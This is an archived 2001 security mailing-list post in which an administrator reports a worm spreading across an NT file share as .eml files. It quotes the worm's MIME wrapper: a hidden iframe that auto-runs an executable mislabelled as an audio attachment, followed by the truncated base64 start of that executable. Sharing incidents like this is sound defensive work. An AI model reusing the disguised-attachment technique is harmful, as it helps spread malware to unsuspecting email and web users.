I've just seen this infest an NT share. I've isolated it to one drive (this machine is a fileserver with no access of it's own to the internet.) Further following behaviour, this worm copies itself into available directories, (I think using a client machine, as this is restricted to one drive only one department has access to) naming itself the same as other files in that directory, except as a .eml . Upon opening in a text editor, the same content as described below by Pedro appears. > > > When I connected to the originating server (femm.tdkomm.com.br), I > saw the normal web page for the institution, plus a pop-up window for > http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as > follows: > > > MIME-Version: 1.0 > Content-Type: multipart/related; > type="multipart/alternative"; > boundary="====_ABC1234567890DEF_====" > X-Priority: 3 > X-MSMail-Priority: Normal > X-Unsent: 1 > > --====_ABC1234567890DEF_==== > Content-Type: multipart/alternative; > boundary="====_ABC0987654321DEF_====" > > --====_ABC0987654321DEF_==== > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > > <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> > <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> > </iframe></BODY></HTML> > --====_ABC0987654321DEF_====-- > > --====_ABC1234567890DEF_==== > Content-Type: audio/x-wav; > name="readme.exe" > Content-Transfer-Encoding: base64 > Content-ID: <EA4DMGBP9p> > > TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAA > AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW > 4gaW4gRE9TIG1v > ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJ > mqSzxytU88cbVO > PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UE > UAAEwBBQB1Oqc7 > AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEA > AAABAAAAQAAAAA > ... (worm code follows) > > I've inspected the executable code, and it reads like a worm. (doh) > > Has anyone seen this? > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:26:52 PDT